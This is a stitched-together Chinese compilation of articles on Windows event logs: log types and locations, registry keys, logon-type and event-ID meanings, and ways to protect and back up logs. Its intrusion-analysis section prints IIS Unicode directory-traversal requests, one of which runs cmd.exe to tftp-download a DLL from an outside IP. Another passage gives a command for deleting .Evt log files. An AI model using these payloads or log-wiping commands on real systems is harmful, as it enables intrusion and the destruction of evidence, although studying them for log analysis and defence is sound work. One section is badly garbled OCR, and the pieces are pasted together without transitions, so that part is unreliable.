Windows日志及其保护
Windows日志
Windows⽇志 在计算机领域,⽇志⽂件(logfile)是⼀个记录了发⽣在运⾏中的操作系统或其他软件中的事件的⽂件,或者记录了在⽹络聊天软件的⽤户之间发送的消息。
⽇志记录(Logging)是指保存⽇志的⾏为。
最简单的做法是将⽇志写⼊单个存放⽇志的⽂件。
1、Windows⽇志应⽤程序⽇志安全⽇志系统⽇志Scheduler服务⽇志FTP⽇志WWW⽇志DNS服务器⽇志这些⽇志的种类会根据你的系统开启的服务的不同⽽有所不同,我们在系统上进⾏⼀些操作时,这些⽇志⽂件通常会记录下我们操作的⼀些相关内容,这些内容对系统安全⼯作⼈员相当有⽤。
⽐如说有⼈对系统进⾏了IPC探测,系统就会在安全⽇志⾥迅速地记下探测者探测时所⽤的IP、时间、⽤户名等,⽤FTP探测后,就会在FTP⽇志中记下IP、时间、探测所⽤的⽤户名等。
(百度百科)通过事件查看器查看(简单打开⽅法:windows+R,输⼊:eventvwr回车)通过Powershell(管理员权限)常⽤命令查看所有⽇志:Get-WinEvent查看应⽤程序⽇志:Get-WinEvent -FilterHashtable @{logname="Application";}2、Windows需要了解的⽇志及其作⽤与位置系统⽇志: 存放了Windows操作系统产⽣的信息、警告或错误。
通过查看这些信息、警告或错误,不但可以了解到某项功能配置或运⾏成功的信息,还可了解到系统的某些功能运⾏失败,或变得不稳定的原因。
安全⽇志: 存放了审核事件是否成功的信息。
通过查看这些信息,可以了解到这些安全审核结果为成功还是失败。
应⽤程序⽇志: 存放应⽤程序产⽣的信息、警告或错误。
通过查看这些信息、警告或错误,可以了解到哪些应⽤程序成功运⾏,产⽣了哪些错误或者潜在错误。
程序开发⼈员可以利⽤这些资源来改善应⽤程序。
应⽤程序⽇志、安全⽇志、系统⽇志、DNS⽇志默认位置:%systemroot%\system32\config(%systemroot%不懂可以查windows变量)安全⽇志⽂件: %systemroot%\system32\config\SecEvent.EVT系统⽇志⽂件: %systemroot%\system32\config\SysEvent.EVT应⽤程序⽇志⽂件: %systemroot%\system32\config\AppEvent.EVTDNS⽇志: %systemroot%\system32\config\DnsEvent.EVTFTP⽇志默认位置: %systemroot%\system32\logfiles\msftpsvc1\WWW⽇志默认位置: %systemroot%\system32\logfiles\w3svc1\(FTP⽇志和WWW服务⽇志,默认每天⼀个⽇志)Scheduler计划任务服务⽇志默认位置:%systemroot%\Tasks\schedlgu.txt(由于系统屏蔽的原因,只能在命令⾏下查看)FTP 和WWW服务⽇志详解:FTP⽇志和WWW⽇志默认情况,每天⽣成⼀个⽇志⽂件,包含了该⽇的⼀切记录,⽂件名通常为 ex (年份)(⽉份)(⽇期)例如: ex180226,(2018年2⽉23⽇产⽣的⽇志)这个由于对IIS并不了解还没有尝试这些位置不⼀定能找到你想要找的⽇志,可以按照下⾯的注册表中的⽇志路径去查找⽇志的位置以上⽇志在注册表⾥的键:应⽤程序⽇志、安全⽇志、系统⽇志、DNS⽇志,这些log⽂件在注册表中的HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\EventlogSchedluler服务⽇志在注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent3、windows⽇志分析在Windows⽇志中记录了很多的操作事件,为了⽅便管理,每种类型的事件都有⼀个惟⼀的编号,这就是事件ID。
windows系统日志分析
(1)unicode漏洞入侵日志记录
这个是个非常经典的漏洞了,要找这样的服务器估计得去国外慢慢找了,但是因为它的日志是最经典的一个,所以我们这里特别拿它来做个示范。
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%\ system32\LogFiles\文件夹下,如图1所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用 GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此漏洞。如图一所示。
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll
502 –
看到了吧?记录非常详细的,系统里面那个程序在响应都记录了下来,这样我们分析入侵行为就好办了。
在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性,如果不移位也无法对文件进行安全设置操作,右击移位后的“文件夹选择属性”,进入“安全”选项卡,不选择“允许将来自父系的可继承权限传播给该对象”,添加“System”组,分别给Everyone组“读取”权限,System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小,如20MB。进行了上面的设置后,直接通过Del C:\*.Evt/s/q来删除是删不掉的,相对要安全很多了。
我们配合入侵来看下这样的记录:通过下面的编码我们在入侵的时候可以查看目标机的目录文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
常用的windows系统日志的类型
常用的windows系统日志的类型Windows系统日志是记录Windows操作系统运行过程中发生的事件和错误的重要工具。
它可以帮助用户追踪系统问题,并提供信息以便进行故障排除和修复。
本文将介绍常见的Windows系统日志类型及其功能。
一、应用程序日志应用程序日志记录了应用程序运行过程中的事件和错误信息。
它可以帮助用户识别应用程序崩溃、错误和警告,以及追踪应用程序的运行情况。
例如,当一个应用程序崩溃时,应用程序日志会记录崩溃的原因,以便用户进行修复。
二、安全日志安全日志记录了与系统安全相关的事件,如用户登录、账户权限变更、安全策略的修改等。
它可以帮助用户监控系统的安全性,及时发现异常行为和安全威胁。
例如,当一个用户尝试登录多次失败时,安全日志会记录这一事件,并提醒用户注意可能存在的入侵行为。
三、系统日志系统日志记录了系统运行过程中的事件和错误信息。
它可以帮助用户了解系统的运行状态,以及识别系统故障和错误。
例如,当系统启动时,系统日志会记录启动过程中的事件,包括硬件检测、驱动加载等,以便用户了解系统启动的情况。
四、设备管理日志设备管理日志记录了与设备管理相关的事件和错误信息。
它可以帮助用户了解设备的连接和断开情况,以及设备驱动程序的加载和卸载情况。
例如,当用户连接一个新的USB设备时,设备管理日志会记录设备的连接信息,包括设备类型、厂商信息等。
五、互联网连接日志互联网连接日志记录了与互联网连接相关的事件和错误信息。
它可以帮助用户了解系统与互联网的连接状态,以及识别网络问题和故障。
例如,当用户无法连接到互联网时,互联网连接日志会记录连接失败的原因,如DNS解析错误、网络设置错误等。
六、应用程序错误日志应用程序错误日志记录了应用程序运行过程中的错误信息。
它可以帮助用户定位和修复应用程序的错误。
例如,当一个应用程序发生未处理的异常时,应用程序错误日志会记录异常的详细信息,包括错误代码、异常堆栈等。
七、硬件故障日志硬件故障日志记录了系统硬件设备发生故障的事件和错误信息。
Windows系统中的系统日志和错误报告分析
Windows系统中的系统日志和错误报告分析在Windows操作系统中,系统日志和错误报告是非常重要的工具,它们可以记录和提供有关系统运行状况的详细信息,帮助用户分析和解决各种问题。
本文将详细介绍Windows系统中的系统日志和错误报告,并解释如何分析它们以便有效地定位和解决故障。
一、系统日志系统日志是一种记录和存储系统事件的功能,它包含了系统启动、关机、硬件故障、驱动程序问题、应用程序错误等多种类型的事件。
通过查看系统日志,用户可以及时发现并解决潜在的问题,提高系统的稳定性和可靠性。
Windows系统中的系统日志分为三类:应用程序日志、安全日志和系统日志。
应用程序日志存储与应用程序相关的事件和错误信息,安全日志用于记录安全相关的事件,而系统日志则包含与操作系统本身有关的事件和错误。
要查看系统日志,用户可以按下Win键+R键,打开运行对话框,输入eventvwr.msc命令,然后在事件查看器中选择相应的日志类型。
通过筛选和查找功能,用户可以根据日志的事件ID、级别和来源等信息找到特定的日志记录。
二、错误报告错误报告是一种Windows系统自动生成的记录故障信息的工具,它可以收集有关应用程序和系统崩溃的详细数据,并发送给Microsoft进行分析和提供解决方案。
错误报告能够帮助用户追踪和解决应用程序或系统崩溃的原因。
当应用程序或系统崩溃时,Windows系统会自动弹出错误报告对话框,用户可以选择发送错误报告给Microsoft或不发送。
如果用户选择发送错误报告,相关的错误信息将被记录并匿名上传,用于改进Windows系统的稳定性和性能。
用户也可以主动查看错误报告,方法是打开控制面板并选择“问题报告和解决”选项。
在问题报告和解决窗口中,用户可以查看已发送的错误报告以及与之相关的解决方案。
三、系统日志和错误报告的分析系统日志和错误报告的分析是解决Windows系统问题的重要步骤。
通过仔细分析日志和错误报告,用户可以找到问题的源头,并采取相应的措施进行修复或优化。
Windows系统专家教你如何设置和管理系统日志
Windows系统专家教你如何设置和管理系统日志在使用Windows操作系统时,系统日志是非常重要的一部分。
它记录了系统的运行状态、错误信息以及其他相关信息,能够帮助用户诊断和解决系统问题。
本文将向大家介绍如何设置和管理Windows系统日志,以帮助您更好地监控和维护您的计算机。
一、什么是系统日志系统日志是Windows操作系统中的一个重要组成部分,用于记录操作系统和应用程序的事件和错误信息。
它包含了以下三个主要日志类型:1. 应用程序日志(Application log):记录应用程序的事件和错误信息,如软件的安装和卸载、应用程序崩溃等。
2. 安全日志(Security log):记录安全事件和审计信息,如用户登录和注销、账户访问权限等。
3. 系统日志(System log):记录与操作系统相关的事件和错误信息,如设备驱动程序错误、系统崩溃等。
二、设置系统日志在Windows系统中,您可以根据实际需求设置系统日志的属性和策略。
下面是设置系统日志的步骤:1. 打开“事件查看器”(Event Viewer):点击“开始”菜单,然后在搜索栏中输入“事件查看器”,并打开该程序。
2. 选择日志类型:在左侧面板中,展开“Windows日志”文件夹,可以看到应用程序日志、安全日志和系统日志三个选项。
3. 添加或删除日志事件:在选中的日志类型下,右键点击空白区域,选择“属性”或“清除日志”选项来设置日志属性或删除日志事件。
4. 配置事件筛选器:点击相应日志类型下的“事件筛选器”菜单,可以根据关键词、事件ID等条件来过滤和筛选所需的日志事件。
5. 设置日志存档:点击相应日志类型下的“存档日志”菜单,可以设置日志事件的存储位置和保留策略,以便将来查看和分析。
三、管理系统日志除了设置系统日志的属性,管理系统日志也是非常重要的一项任务。
下面是一些管理系统日志的技巧:1. 定期查看日志:定期浏览系统日志,注意查找和分析其中的错误和警告信息,及时采取措施解决相关问题。
Windows服务器日志文件的保护
s e c u r it y 、
S y s te m 几项 分别对应
”
“
“
”
”
”
应用程序 日志
安全 日志
系统 日志 下 面 以应 用程序
、
.
,
臼志 为例 .
介 绍 如 何 修 改 日 志 文 件 的保 存 位 置 及 文 件 大 小 。
首
中 先 选
。
“
A p 叫 c a t io n
项
在右侧框 中找 到
日
s y s Ev e n t
Ev I 。
下 面就 以我 们学 院服 务器 安装 的w ln d o w s s e r v e r 2 0 0 3 为例 介 ,
绍一 种保 护 W in d o w s 日 志 文件 的方 法 。
(1 ) 改变 w in d o w s 日 志 文 件 的保存位 置 及 文 件 大 小
如 果我们 自己 想清空
w
in d o w s 日 志
只要赋予相应账号对
“
Ln s a
”
,
。
”
目录 修 改
权限即可 。
(3 ) 自动 备份 w l n d o w s 日 志文 件
经过上 述设置 后 最后我们还 需备份 日志文件 以防止 日志文
.
.
件被删 除 。 备份w
ln d o w
s 曰志文件方法很 多 可 以利 用利 用w ,
M s ”
”
a x lz e
值编 .
辑修改其 中的数值就可 更改 日志 文件 的大小 日志 文件 默认只 ,
有 5 1 2 KB .
因此存储的 日志记 录信息有限 ,
Windows操作系统日志安全的防范手段及设想
Windows操作系统日志安全的防范手段及设想作者:刘桂英来源:《硅谷》2009年第20期[摘要]Window操作系统日志记录系统运行的状态,通过分析操作系统日志,可以实现对操作系统的实时监控,达到入侵防范的目的。
目前保护操作系统日志的手段都存在一定的安全缺陷。
为弥补这些安全缺陷,首先阐述系统日志安全通常包含哪几方面,然后分析现有系统日志安全的不足,主要讲述黑客如何通过提高权限来清除日志,最后提出系统安全的保护措施及防范手段及设想。
[关键词]Windows操作系统日志日志安全日志分析系统安全保护措施中图分类号:TP3文献标识码:A文章编号:1671—7597(2009)1020114--01操作系统日志是操作系统为系统应用提供的一项审计服务,这项服务在系统应用提供的文本串形式的信息前面添加应用运行的系统名、时戳、事件ID及用户等信息,然后进行本地或远程归档处理、但是操作系统日志并不安全,一些Windows的系统日志很容易被黑客篡改或清除,不过操作系统日志很容易使用,许多安全类工具都使用它作为自己的日志数据。
操作系统日志分析器能够将大量的系统日志信息经过提取并处理得到能够让管理员识别的可疑行为记录,然后日志分析器可以扩展成为一个计算机监控系统并且能实时地对可疑行为进行动态的响应。
为了保证日志分析器的正常判断,系统日志的安全就显得异常重要,这就需要从各方面去保证日志的安全性,系统日志安全通常与三个方面相关,简称为“CIA”:1、保密性(Confidentiality):使信息不泄露给非授权的个人、实体或进程,不为其所用。
2、完整性(Integrity):数据没有遭受以非授权方式所作的篡改或破坏。
3、确认性(Accountability);确保一个实体的作用可以被独一无二地跟踪到该实体。
一、操作系统日志完整性检查和一致性检查的安全方法对操作系统日志的完整性检查和一致性检查可以从以下五个小的方面进行分析判断日志是否保持完整性和一致性:1、原始日志的结构与操作系统设置的形式结构不相符合的。
Windows 系统日志文件的保护
Windows 系统日志文件的保护、备份和分析Windows系统以它的易用性倍受网管员的青睐,国内相当部分的大型网站都是用Windows 2000/XP系统建立的。
Windows系统使用的人多了,研究它安全的人也多了。
在此我要提醒一下网管们,虽然你补上了所有的安全补丁,但是谁又知道新的漏洞何时又会被发现呢?所以也应该做好系统日志的保护工作。
作为黑客,他们也是最关心系统日志的,一旦他们入侵成功,要做的第一件事就是删除你的日志文件,使你在被入侵后无法追踪黑客行为,以及检查黑客所做的操作行为。
日志文件就像飞机中的“黑匣子”一样重要,因为里面保存着黑客入侵行为的所有罪证。
日志的移位与保护Windows 2000的系统日志文件包括:应用程序日志、安全日志、系统日志、DNS服务日志,以及FTP连接日志和HTTPD日志等。
在默认情况下日志文件大小为512KB,日志保存的默认的位置如下:安全日志文件:%systemroot%\system32\config \SecEvent.EVT系统日志文件:%systemroot%\system32\config \SysEvent.EVT应用程序日志文件:%systemroot%\system32\config \AppEvent.EVTFTP连接日志和HTTPD事务日志:%systemroot% \system32\LogFiles\,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
在此笔者把系统默认为.EVT扩展名的日志文件统称为事件日志,笔者看了好多文章介绍对事件日志移位能做到很好的保护。
移位虽是一种保护方法,但只要在命令行输入dirc:\*.evt/s(如系统安装在D盘,则盘符为D),一下就可查找到事件日志位置。
日志移位要通过修改注册表来完成,我们找到注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog位置,下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。
Windows事件日志
Windows事件日志详解windows 安全日志时,经常发现登录类型的值不同。
有2,3,5,8等。
最常见的类型是 2 (交互式)和 3 (网络)。
下面详细列出了可能的登录类型值登录类型2:交互式登录(Interactive)这应该是你最先想到的登录方式吧,所谓交互式登录就是指用户在计算机的控制台上进行的登录,也就是在本地键盘上进行的登录。
登录类型3:网络(Network)当你从网络的上访问一台计算机时在大多数情况下Windows记为类型3,最常见的情况就是连接到共享文件夹或者共享打印机时。
另外大多数情况下通过网络登录IIS时也被记为这种类型,但基本验证方式的IIS登录是个例外,它将被记为类型8,下面将讲述。
成功的网络登录:用户名:域:登录ID: (0x2,0xFC38EC05)登录类型: 3登录过程: NtLmSsp身份验证数据包: NTLM工作站名: 098B11CAF05E4A0登录GUID: -调用方用户名: -调用方域: -调用方登录ID: -调用方进程ID: -传递服务: -源网络地址: 192.168.197.35源端口: 0调用方进程名称: %16登录类型4:批处理(Batch)当Windows运行一个计划任务时,“计划任务服务”将为这个任务首先创建一个新的登录会话以便它能在此计划任务所配置的用户账户下运行,当这种登录出现时,Windows在日志中记为类型4,对于其它类型的工作任务系统,依赖于它的设计,也可以在开始工作时产生类型4的登录事件,类型4登录通常表明某计划任务启动,但也可能是一个恶意用户通过计划任务来猜测用户密码,这种尝试将产生一个类型4的登录失败事件,但是这种失败登录也可能是由于计划任务的用户密码没能同步更改造成的,比如用户密码更改了,而忘记了在计划任务中进行更改。
登录类型5:服务(Service)与计划任务类似,每种服务都被配置在某个特定的用户账户下运行,当一个服务开始时,Windows首先为这个特定的用户创建一个登录会话,这将被记为类型5,失败的类型5通常表明用户的密码已变而这里没得到更新,当然这也可能是由恶意用户的密码猜测引起的,但是这种可能性比较小,因为创建一个新的服务或编辑一个已存在的服务默认情况下都要求是管理员或serversoperators身份,而这种身份的恶意用户,已经有足够的能力来干他的坏事了,已经用不着费力来猜测服务密码了。
Windows事件日志简要解析
Windows事件日志简要解析简介:Windows系统内置三个核心日志文件:System、Security、Application,默认大小均为20480kB也就是20MB,记录数据超过20MB时会覆盖过期的日志记录;其他的应用程序以及服务日志默认大小均为1MB,超过这个大小一样的处理方法。
日志类型:事件类型注释信息(Information)指应用程序、驱动程序、或服务的成功操作事件警告(Warning)警告事件不是直接的、主要的,但是会导致将来问题的发生错误(Error)指用户应该知晓的重要问题成功审核(Success Audit)主要指安全性日志,记录用户的登录/注销、对象访问、特权使用、账户管理、策略更改、详细跟踪、目录服务访问、账户登录事件失败审核(FailureAudit)失败的审核安全登录尝试事件日志文件类型:类别类型描述文件名Windows 日志系统包含系统进程,设备磁盘活动等。
事件记录了设备驱动无法正常启动或停止,硬件失败,重复IP地址,系统进程的启动,停止及暂停等行为。
System.evtxWindows 日志安全包含安全性相关的事件,如用户权限变更,登录及注销,文件及文件夹访问,打印等信息。
Security.evtxWindows 日志应用程序包含操作系统安装的应用程序软件相关的事件。
事件包括了错误、警告及任何应用程序需要报告的信息,应用程序开发人员可以决定记录哪些信息。
Application.evtx应用程序及服务日志Microsoft Microsoft文件夹下包含了200多个微软内置的事件日志分类,只有部分类型默认启用记录功能,如远程桌面客户端连接、无详见日志存储目录对应文件类别类型描述文件名线网络、有线网路、设备安装等相关日志。
应用程序及服务日志MicrosoftOfficeAlters微软Office应用程序(包括Word/Excel/PowerPoint等)的各种警告信息,其中包含用户对文档操作过程中出现的各种行为,记录有文件名、路径等信息。
Windows系统日志文件的保护
Windows 系统日志文件的保护、备份和分析Windows系统以它的易用性倍受网管员的青睐,国内相当部分的大型网站都是用Windows 2000/XP系统建立的。
Windows系统使用的人多了,研究它安全的人也多了。
在此我要提醒一下网管们,虽然你补上了所有的安全补丁,但是谁又知道新的漏洞何时又会被发现呢?所以也应该做好系统日志的保护工作。
作为黑客,他们也是最关心系统日志的,一旦他们入侵成功,要做的第一件事就是删除你的日志文件,使你在被入侵后无法追踪黑客行为,以及检查黑客所做的操作行为。
日志文件就像飞机中的“黑匣子”一样重要,因为里面保存着黑客入侵行为的所有罪证。
日志的移位与保护Windows 2000的系统日志文件包括:应用程序日志、安全日志、系统日志、DNS服务日志,以及FTP连接日志和HTTPD日志等。
在默认情况下日志文件大小为512KB,日志保存的默认的位置如下:安全日志文件:%systemroot%\system32\config \SecEvent.EVT系统日志文件:%systemroot%\system32\config \SysEvent.EVT应用程序日志文件:%systemroot%\system32\config \AppEvent.EVTFTP连接日志和HTTPD事务日志:%systemroot% \system32\LogFiles\,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
在此笔者把系统默认为.EVT扩展名的日志文件统称为事件日志,笔者看了好多文章介绍对事件日志移位能做到很好的保护。
移位虽是一种保护方法,但只要在命令行输入dirc:\*.evt/s(如系统安装在D盘,则盘符为D),一下就可查找到事件日志位置。
日志移位要通过修改注册表来完成,我们找到注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog位置,下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。
Windows日志安全
Windows⽇志安全Windows⽇志安全、分析Windows⽇志系统Windows使⽤"事件管理器"来管理⽇志系统,需要⽤系统管理员⾝份进⼊系统进⾏操作。
Windows的⽇志⽂件⼀般分为三类:1、系统⽇志 跟踪各种各样的系统事件,记录由Windows NT的系统组件产⽣的事件。
如:在启动过程加载驱动程序错误或其他系统组件的失败记录在系统⽇志中。
2、应⽤程序⽇志 记录由应⽤程序或系统程序产⽣的事件。
如:应⽤程序产⽣的装载dll(动态链接库)失败的信息将出现在⽇志中。
3、安全⽇志 记录登陆上⽹,下⽹,改变访问权限以及系统启动和关闭等事件以及与创建、打开或删除⽂件等资源使⽤相关联的事件。
系统的"事件管理器"可以指定在安全⽇志中记录需要记录的事件。
启动Windows时,事件⽇志服务会⾃动启动,所有⽤户都可以查看"应⽤程序⽇志",但是只有系统管理员才能访问"安全⽇志"和"系统⽇志"。
常见的windows登录⽇志类型分析登录类型2:交互式登录(Interactive)指⽤户在计算机的控制台上进⾏登录,也就是在本地键盘上进⾏的登录。
(KVM登录属于交互式登录)登录类型3:⽹络(Network)从⽹络上访问⼀台计算机时就属于⽹络登录。
如:连接到共享⽂件夹或者共享打印。
登录类型4:批处理(Batch)当windows运⾏⼀个计划任务时,"计划任务服务"将为这个任务⾸先创建⼀个新的登录会话以便他能在此计划任务所配置的⽤户账号下运⾏。
(恶意⽤户通过计划任务来猜测⽤户密码,这将产⽣⼀个类型4的登录失败事件)登录类型7:解锁(Unlock)当⽤户离开计算机,屏保就会启动锁定计算机,需要输⼊密码才能重新进⼊。
(失败的类型7登录表明有⼈输⼊了错误的密码或者有⼈在尝试解锁计算机)登录类型8:⽹络明⽂(NetworkCleartext)像类型3⼀样,这种登录的密码在⽹络上是通过明⽂传输的。
系统日志安全要求包括哪些
系统日志安全要求包括哪些系统日志对于保证网络和信息系统安全至关重要。
它们不仅提供了关于系统状态的关键信息,还可以用作异常监测和故障排除的重要工具。
然而,如果不加以保护,系统日志本身可能会成为攻击者进入系统的入口。
为确保安全,以下是几个系统日志安全的要求。
1. 日志应至少存储90天日志文件应设置为最少保留90天。
这将使您有充足的时间检查记录以查看任何潜在的攻击,并找出任何问题的根源。
如果在短时间内删除了日志文件,则无法检测到现有的恶意行为,这也可能会阻碍任何调查工作。
2. 日志文件应加密存储尽管未加密的日志文件可以被用于系统故障排除,但是它们容易受到攻击者的目标。
日志应该加密并存储在受保护的存储库中,只有获得适当的许可才能访问它们。
加密后的数据可以在被转移或共享时保护数据的机密性。
3. 应限制访问日志的人员范围只有拥有适当权限的人员才应该能够访问日志。
在访问日志文件之前,应该需要进行身份验证,例如用户名和密码、数字证书或biometrics等安全措施。
这可以确保只有授权人员才能访问日志文件。
4. 日志文件应具备可追溯性日志文件应该包括所有被记录的详细信息,这将使检查人员在必要时能够完全重现访问和日志信息的时间线,或者从一个事件中寻找用户和系统行为的详细信息。
日志应包含有关数据、时间、用户和系统事件的完整信息,以便您在需求时能够跟踪。
5. 应对异常事件进行报告和恢复日志应该可以检测任何异常事件并以此记录相应的信息,例如非授权的登陆尝试,服务器冲突、崩溃等等。
一旦检测到异常事件,应该有合适的通知和恢复方法,和相应处理计划。
结论上述要求并不是全部,但对于创建有效且安全的系统日志至关重要。
实现这些要求可以确保您的日志对于系统安全和网络安全是可靠的,并有助于您确定诸如入侵尝试之类的恶意行为。
Windows 2003系统安全日志
535
Logon Failure - The specified account's password has expired
登录失败。指定帐户的密码已过期。
536
Logon Failure - The NetLogon component is not active
IPSec策略代理遇到一个可能很严重的故障。
617
Kerberos Policy Changed
Kerberos v5策略已更改。
618
Encrypted Data Recovery Policy Changed
加密数据恢复策略已更改。
620
Trusted Domain Information Modified
519
A process is using an invalid local procedure call (LPC) port
进程正在使用无效的本地过程调用(LPC)端口,试图伪装客户端并向客户端地址空间答复、读取或写入。
520
The system time was changed
修改系统时间
528
已获取对象的间接访问权。
600
A process was assigned a primary token
已分配给进程主令牌。
601
Attempt to install service
用户试图安装服务。
602
Scheduled Task created
已创建计划程序任务。
608
User Right Assigned
成员已添加至全局组。
633
Security Enabled Global Group Member Removed
windows日志
一.Windows日志系统WindowsNT/2000的系统日志文件有应用程序日志AppEvent.Evt、安全日志SecEvent.Evt、系统日志SysEvent.Evt,根据系统开通的服务还会产生相应的日志文件。
例如,DNS服务器日志DNS Serv.evt,FTP日志、WWW日志等。
日志文件默认存放位置:%systemroot%\system32\config,默认文件大小512KB。
这些日志文件在注册表中的位置为HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog,可以修改相应键值来改变日志文件的存放路径和大小。
Windows NT/2000主要有以下三类日志记录系统事件:应用程序日志、系统日志和安全日志。
1.应用程序日志记录由应用程序产生的事件。
例如,某个数据库程序可能设定为每次成功完成备份后都向应用程序日志发送事件记录信息。
应用程序日志中记录的时间类型由应用程序的开发者决定,并提供相应的系统工具帮助用户查看应用程序日志。
2.系统日志记录由WindowsNT/2000操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。
系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。
3.安全日志记录与安全相关的事件,包括成功和不成功的登录或退出、系统资源使用事件(系统文件的创建、删除、更改)等。
与系统日志和应用程序日志不同,安全日志只有系统管理员才可以访问。
在WindowsXP中,事件是在系统或程序中发生的、要求通知用户的任何重要事情,或者是添加到日志中的项。
事件日志服务在事件查看器中记录应用程序、安全和系统事件。
通过使用事件查看器中的事件日志,用户可以获取有关硬件、软件和系统组件的信息,并可以监视本地或远程计算机上的安全事件。
事件日志可帮助您确定和诊断当前系统问题的根源,还可以帮助用户预测潜在的系统问题。
Windows系统的系统日志分析与故障定位
Windows系统的系统日志分析与故障定位在使用Windows操作系统时,系统日志是一项重要的工具,可以帮助我们分析和解决系统故障。
本文将介绍如何利用系统日志进行分析和定位故障的方法和步骤。
一、什么是系统日志系统日志是Windows操作系统记录系统事件和错误的一种机制。
它可以记录关键信息,如错误代码、警告信息、应用程序崩溃等。
系统日志位于事件查看器中。
二、系统日志分析的步骤1. 打开事件查看器:在Windows系统中,可以通过按下Win键+R 组合键,然后输入"eventvwr.msc"来打开事件查看器。
2. 查看系统日志:在事件查看器中,找到"Windows日志",然后展开,可以看到包括应用程序、安全性、系统等不同类型的日志。
3. 过滤和筛选日志:根据需要,可以使用筛选功能来过滤日志。
例如,如果只要查看系统错误,可以通过选择"系统"日志并应用筛选条件来筛选。
4. 查看错误详细信息:在选定的日志中,可以查看每个事件的详细信息。
这些信息包括事件ID、日志级别、源、描述等。
5. 解读错误信息:根据错误描述、事件级别以及其他相关信息,进行错误分析。
可以通过搜索错误代码或描述来获取更多相关信息。
6. 寻找解决方案:根据错误信息,搜索互联网上的解决方案或参考Microsoft官方文档、技术支持等资源,找到解决方案。
三、常见的系统日志故障与解决方法1. 系统启动故障:如果系统无法启动,可以查看"系统"日志以了解引起启动问题的可能原因,例如硬件故障、驱动程序冲突等。
2. 应用程序崩溃:如果某个应用程序频繁崩溃,可以查看应用程序特定的日志,并注意错误代码和描述。
可能的解决方案包括重新安装应用程序、更新驱动程序等。
3. 网络故障:如果网络连接遇到问题,可以查看"系统"日志中的网络适配器、DHCP等相关信息。
根据错误代码和描述,尝试重新启动网络适配器、重新配置IP等操作。
常用的windows系统日志的类型
常用的windows系统日志的类型Windows系统日志是一种重要的系统监控和故障诊断工具,它可以记录并保存有关系统和应用程序的信息,包括错误、警告、信息和安全事件等。
这些日志的分类与存储方式井然有序,并且有助于管理员找到事件的原因。
下面将介绍常用的Windows系统日志类型。
一、应用程序日志应用程序日志是记录应用程序事件的日志。
当应用程序发生错误或其他异常时,它会用此日志记录详细信息,例如错误信息、警告信息、性能信息以及其他有用的信息,以帮助管理员迅速的排除故障。
二、安全日志安全日志是记录计算机安全事件的日志。
当出现安全事件时,例如撞库、病毒入侵,Windows会记录这些事件,包括攻击者如何入侵系统、攻击者的ip、攻击类型等等,以帮助管理员解决安全问题并制定安全策略。
三、系统日志系统日志是记录系统事件的日志。
当系统出现问题时,例如系统崩溃、磁盘故障、病毒感染、硬件故障等等,Windows会自动生成这些事件,以帮助管理员了解事件发生的原因,及时排除故障。
四、DNS日志DNS日志是记录DNS服务器运作情况的日志。
当处理DNS查询的请求时,DNS服务器会将查询请求、相应的应答以及各种错误信息记录在DNS日志中。
这些记录通常由系统管理员用于故障排查和性能分析。
五、远程桌面服务日志远程桌面服务日志是记录远程桌面服务相关事件的日志。
当Windows远程桌面服务出现问题时,它可以记录故障现象,例如用户远程连接失败的原因,以帮助管理员快速诊断并解决问题。
总之,以上是常用的Windows系统日志类型,每种日志都有特定的格式和内容,它们的重要性不言而喻,可以帮助管理员更好地维护和管理计算机。
在实际维护工作中,管理员应该及时查看和收集相关日志信息,以便及时诊断并解决问题。
windows安全日志分析
window安全日志分析今日服务器遭受入侵,入侵路径回溯:被入侵服务器->跳板机->办公网某主机。
因此整理记录windows被入侵相关信息。
本文只研究windows安全登录相关日志,介绍三种事件类型(登录,注销,尝试登陆)。
通过此日志可查看windows主机是否通过3389远程服务爆破进入。
注:windows日志有存储大小限制,有被覆盖的可能。
可修改,请自行百度。
1.1 windows日志位置我的电脑右键管理:刷选windows安全日志事件ID:4000-4700,登录相关1.2 三种登录事件详解1.2.1 事件4648(尝试登陆)事件4648描述:此事件发生在日志所在windows主机,表明日志所在windows主机尝试连接远程主机,无论连接成功与否,这里都会记录。
网络地址端口:经测试发现只有同一局域网(且同一C段)才会记录目标服务器ip端口。
1.2.2 事件4624(登陆成功)事件4624描述:表示日志所在win主机被成功连接“使用者”:指明本地系统上请求登录的帐户。
这通常是一个服务(例如Server 服务)或本地进程(例如Winlogon.exe 或Services.exe)。
“登录类型”:指明发生的登录种类。
最常见的类型是2 (交互式)和3 (网络)。
(登陆类型3:例如连接共享文件,打印机等;登陆类型7:解锁;登陆类型10:例如远程桌面等参考连接:/s/blog_5c39a08901012uu5.html)“新登录”:指明新登录是为哪个帐户创建的,即登录的帐户。
“网络信息”:指明远程登录请求来自哪里。
“工作站名”并非总是可用,而且在某些情况下可能会留为空白。
